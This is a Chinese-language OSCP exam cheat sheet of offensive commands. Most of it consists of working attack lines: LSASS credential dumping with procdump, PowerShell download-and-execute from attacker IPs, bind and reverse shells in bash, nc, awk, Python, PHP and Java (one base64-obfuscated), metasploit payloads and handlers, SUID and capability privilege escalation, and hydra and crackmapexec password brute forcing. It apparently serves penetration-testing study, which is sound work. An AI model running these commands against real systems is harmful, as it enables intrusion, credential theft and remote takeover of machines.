oscp常用命令备忘
端口扫描
nmap -sV -v -A ip
nmap -sU ip #udp扫描,一般用不着,没思路了可以试试
windows权限检查
windows-privesc-check2.exe --audit -a -o wpc-report
windows域相关
导出lsass
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
Windows文件传输
#有可能没有powershell
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/Sherlock.ps1') ; Find-AllVulns"
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
certutil -urlcache -split -f http://192.168.119.170:8000/Sherlock.ps1
http://virgil-cj.blogspot.com/2018/02/escalation-time.html
smb文件传输
#在当前目录启动一个共享名为share的smb serve,默认是smbv1看情况启用smb2
sudo impacket-smbserver share `pwd` -smb2support
#靶机下载文件
copy \\IP\ShareName\file.exe file.exe
#靶机上传
net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete
正向shell
Linux
python
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',11))
server.listen(5)
print 'waiting for connect'
talk, addr = server.accept()
print 'connect from',addr
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
stdout=talk, stderr=talk, shell=True)
msf
先生成正向shell的payload
msfvenom -p linux/x64/meterpreter/bind_tcp -a x64 --platform linux LPORT=4444 -f elf > bindtcp.elf
用蚁剑传上去,chmod +x,再运行。
kali这边再开始连接。
Windows
python
from socket import *
import subprocess
import os, threading
def send(talk, proc):
import time
while True:
msg = proc.stdout.readline()
talk.send(msg)
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',11))
server.listen(5)
print 'waiting for connect'
talk, addr = server.accept()
print 'connect from',addr
proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
t = threading.Thread(target = send, args = (talk, proc))
t.setDaemon(True)
t.start()
while True:
cmd=talk.recv(1024)
proc.stdin.write(cmd)
proc.stdin.flush()
server.close()
msf
常用payload windows/x64/meterpreter_bind_tcp
反弹shell
Linux
bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
# nc
nc -e /bin/bash 192.168.99.242 1234
#awk
awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
#python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
#PHP
php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Java版
public class Revs {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
Windows
powercat
Import-Module ./powercat.ps1PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd
nc
nc.exe ip port -e cmd.exe
msf
使用windows/x64/meterpreter_reverse_tcp
msf监听
看情况修改payload等各项参数。
查看所有payload方法
msfvenom --list payloads
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.40.129
set lport 4444
run
反弹shell升级
半交互式
python -c 'import pty; pty.spawn("/bin/bash")'
全交互式
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
reset
export SHELL=bash
openssl生成加密shell
还没用到,先不记了
suid提权
寻找有suid权限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
提权辅助网站
和上面类似的windows通过特权二进制提权的查询网址:链接
setsuid提权
getcap -r / 2>/dev/null #查询被赋予CAP_SETUID权限的文件,来获取某些文件是否有利用的价值。目前得出可以利用用的几个
第一次执行时,不要重定向错误流,有可能导致问题被忽略
perl, python, tar
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
暴力破解
ssh
hydra -l <account> -P /usr/share/wordlists/rockyou.txt.gz ssh://10.10.10.233
子域名(vhost)
wfuzz -c -u "http://aaa.bbb/" -H "Host:FUZZ.aaa.bbb" -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt
先跑一次确认不存在的子域名的返回特征,再配合使用--hl等参数进行筛选。或者gobuster
gobuster vhost -u http://aaa.bbb -w Documents/SecLists-2021.3.1/Discovery/DNS/subdomains-top1million-110000.txt
爆破smb
crackmapexec smb ip -u user.txt -p "passwd"
hash爆破
判断hash类型
hashid
hash-identifier
hashcat hash实例